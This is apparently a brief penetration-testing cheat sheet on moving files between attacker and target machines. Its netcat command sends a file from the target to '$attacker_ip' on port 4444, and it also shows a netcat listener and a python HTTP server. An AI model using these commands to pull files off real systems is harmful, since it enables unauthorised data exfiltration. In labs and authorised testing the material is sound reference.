Skip to content

Transfer

Transfer with nc on attacker and target ip

Transfer with nc, target machine
nc $attacker_ip 4444 < '$File_to_transfer'
Transfer with nc, listener
nc -lvp 4444 > '$File_to_transfer'
Transfer with python
python -m http.server 8000

Transfer with FTP

Use ftp binary mode to avoid corrupt transfer